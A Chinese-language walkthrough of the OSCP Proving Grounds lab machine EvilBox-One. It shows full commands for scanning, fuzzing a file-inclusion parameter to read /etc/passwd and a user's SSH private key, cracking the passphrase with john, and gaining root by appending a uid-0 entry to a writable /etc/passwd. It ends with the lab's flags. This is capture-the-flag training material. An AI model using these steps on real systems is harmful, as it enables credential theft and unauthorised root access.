OSCP - Proving Grounds - EvilBox-One

主要知识点

• 类似黑盒测试，毫无线索的情况下只能去猜，如果是php文件则会比较容易达到入侵的目的
• 即使有php文件了，由于不知道代码，只能测试一下有没有文件包含漏洞
• 所以反正没线索的时候，就只能猜

具体步骤

nmap扫描，只开放了80和22端口,而80端口也只是一个default页面，没有什么线索

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 12:58 UTC
Nmap scan report for 192.168.56.212
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
|   256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_  256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works

但是nikto里包含了一些额外的信息, robots.txt和/secret/路径

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.212
+ Target Hostname:    192.168.56.212
+ Target Port:        80
+ Start Time:         2024-12-02 12:59:17 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c9a9bb4d712e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /secret/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-12-02 12:59:33 (GMT0) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

robots.txt中的内容是`Hello H4x0r`,没有发现有什么用处，线索也不太多，所以强行爆破/secret/路径寻找php文件，发现了evil.php

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.225.212/secret/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   502,404,429,503,400
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/evil.php             (Status: 200) [Size: 0]

强行试验一下有无文件包含漏洞，得知确实存在文件包含漏洞，而参数名为command

:\home\kali\Documents\OFFSEC\play\EvilBox-One> ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt -u http://192.168.225.212/secret/evil.php?FUZZ=/etc/passwd -fs 0

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.225.212/secret/evil.php?FUZZ=/etc/passwd
 :: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

command                 [Status: 200, Size: 1398, Words: 13, Lines: 27, Duration: 448ms]
:: Progress: [4730/4730] :: Job [1/1] :: 92 req/sec :: Duration: [0:00:57] :: Errors: 0 ::

通过先后包含 /etc/passwd和/home/mowree/.ssh/id_rsa文件获取到key文件用于登录，这里需要注意,如果是在浏览器中打开 http://192.168.225.212/secret/evil.php?command=/home/mowree/.ssh/id_rsa ，则一定要用查看页面源码的 方式才能获取到格式化好的RSA key文件，否则无法使用

尝试用获得的key进行ssh登录，但是提示需要passphrase,试验了robots.txt里的内容，无效，用john爆破一下,获得了密码 unicorn,使用该passphrase可以成功登录

C:\home\kali\Documents\OFFSEC\play\EvilBox-One> ssh2john id_rsa >id_rsa.hash                                 
                                                                                                                                                                                                                                                                                                                                                                          
C:\home\kali\Documents\OFFSEC\play\EvilBox-One> john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (id_rsa)     
1g 0:00:00:00 DONE (2024-12-02 22:35) 33.33g/s 41600p/s 41600c/s 41600C/s ramona..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
C:\home\kali\Documents\OFFSEC\play\EvilBox-One> ssh -i id_rsa mowree@192.168.225.212                        
Enter passphrase for key 'id_rsa': 
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ 

                                                                                  

登录后尝试了SUID,sudo -l都没有什么信息，但是在上传了linpeas.sh并运行后发现了 /etc/passwd对于所有用户都有读写权限

╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3129 feb 10  2019 usr.bin.man

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

首先我们需要构造出一条记录，在插入到/etc/passwd后面就可以了

mowree@EvilBoxOne:~$ openssl passwd 1234
iQPI1FVnABms.
mowree@EvilBoxOne:~$ echo "tim:iQPI1FVnABms.:0:0:root:/root:/bin/bash" >> /etc/passwd
mowree@EvilBoxOne:~$ su tim
Contraseña: 
root@EvilBoxOne:/home/mowree# cat /root/proof.txt
d8033de92c0ee15a21ae22c39b979663
root@EvilBoxOne:/home/mowree# cat local.txt
07894098e76a0de660070a673dd51a6e